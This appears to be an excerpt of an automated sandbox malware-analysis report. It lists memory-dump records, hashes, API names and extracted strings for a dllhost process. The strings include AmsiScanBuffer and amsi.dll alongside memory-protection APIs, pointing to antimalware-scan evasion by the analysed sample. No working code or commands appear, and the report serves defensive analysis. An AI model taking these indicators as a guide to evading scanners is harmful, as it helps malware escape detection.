                                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction Fuzzy Hash: 24D19D3A204BC881DB709B1AE49439E77A1F3C8B98F55812AEECD4776ADF39C551CB04
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: b4164104759a42f68289d27f34dc3bf055787bdff0abd420a5afdce33fff53c5
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: 3451BF31251B85A5EB09DF24E8916EC33A2BB94744F88493DBD2C067A7FF79C56AC340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: d1be2e71105d053f263df4cab093ee997b37e52b00728c541e73c3e9f25ed74e
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: E451A939241BC595EF099B24E8913EC23A2BB94764F88C83DBD2D067AAFF75C556C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $rbx-
                                                  • API String ID: 756756679-3661604363
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: ddbc2742e404b957ea05f48161f8edb77ec29f91fc8d74d70efd434fa568c4d6
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: 01317E32701B95A2EA19DF16E5447AD63A6FBC4F84F0C8038AF4807B56FF38C4A28704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $rbx-
                                                  • API String ID: 756756679-3661604363
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: 01a3c1abdc2e49f5cd3fdfd359a2ccc5d5754d5c7e6d7a02f4153c05a9d3b987
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: 60315F39701BD582EA29DF26D5447AD63A6FB84FA4F4CC038AE4847B56FF39D4628700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: 4dd8126c2e70f880a2b585176c5349ae72a0b7e4dc446a29065a6f39018c9abd
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: 89114F312052C062FA14A731E9157FE1353ABCA790F9C567CBDAA567CBFE28C4434300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: 729d51382afc7c4b3148ce236d959bf3ff1e33c43ade759b8ead48446a09950c
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: 841119396042C042FA146B31E9553EE1253BBCA7B4FDCC67CBD6A562CBFE2AC4034210
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: d60d2c758e915a4d11e5d10860bba4ce38f944ba3807c6f941f63b3eded7de0d
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: 15011B31715A8096EA14DB12E998B9D63A2F7C8FC0F488079AE9D43756EE3DC586C780
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: d39c3802367eb970469d42e78d0c76f3521270f2e661142744d57cef258e7400
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: A7011E35704AC086EA14DB22E55479D63A2F7C8FE4F88C139AE5D43755EE3DC546C780
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: fe1bf7927918a225e3104fa881a18ebe12aecd470c7aeb99e1e6b8871aeb2c60
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 81011B75212B8092EB249B21E88879D73A2BB99B45F08403CFD4D06366FF3EC05AC700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: f0eefef6772c042791dda6a776f1f2c444fba9fadefdce53e260ee23b0a1b937
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 700103792117C082FB249B21E89879D62B2BB95B65F58C03CEE4D06366FF3EC049C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: eb124c4fa438fbf1973d1861264ad6961a7f2fa81273a2ce02b1467c789c96c0
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: 02F031723046C592E7209B21E684B9D6362F784B98F888079BE4D46556EE6DC65AC700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: 3745bd1763e36e9714691698399ad1807dde67d9de866a1d045ffb6c633a18b8
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: F7F031763046C592EB209B21E69439DA762F788BA8FC8C039BE4D46555EE6DC64AC700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: 9a4f613f9bf8528741280c14ae9942e11184b2df7d2425cc72eeaf2028637a99
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: EEF0963121578151EA108B24D8857AD1326EBCA760F9C427DFE6D451E6EF3DC44AC700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: 703e40fa34cf4f30feca8f46f748644d437c4da7743dad07d5fd62defb489fba
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: E6F058B5714BC082EA049B12FA1419DA362AB88FC0F4C8078FE4E07B1AEE2CC4478700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: 0c0134754269bf9e832995001080af9dcb0cdf5b65a6419cf770afa82d600d36
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: 05F062392156C151EA108B24D8853AD1372EBC67B0F9CC23DFE69451E6EF2DC44AC700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: 5d126dd7b6a97bdbd3981dacaa7a108a0f6ff49736b33c82afc367a05c5753af
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: 8AF05E78314BC081EA449B22FA1419D6262BBC8FE1F8CC038FE5A07B1AEE2CC4478700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: 25181155dc60f2ee4cd4fb4597ee5215f588dcf8e7e6786a7ce31a526a3c3391
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: 80D04C30616580A5E909AB11ED94B9C23636BD4B01F88847DBD4E15263FE2D855A8340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: 026a09c0f74d2d4287ef0722ec04a1babdcedae6b7ad4687bf76c5f04d12c154
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: 41D04C386155C095E9196B21DD9439C22637BD4B21FD8C43DAD4E45266FE2D455A8340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction ID: da009364d8b0d5cc5a96a28ae210a3e07b7ee269e8633c2112d2ffb0396eb310
                                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction Fuzzy Hash: E702B632219BC486EB608B55E49079EB7A1F3C4794F144129FE8E87BA9EB7CC495CB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction ID: 705cd90541a7c2725a940fd812baf4b0ee6fbcaa47d1c829f5b88636044f9f07
                                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
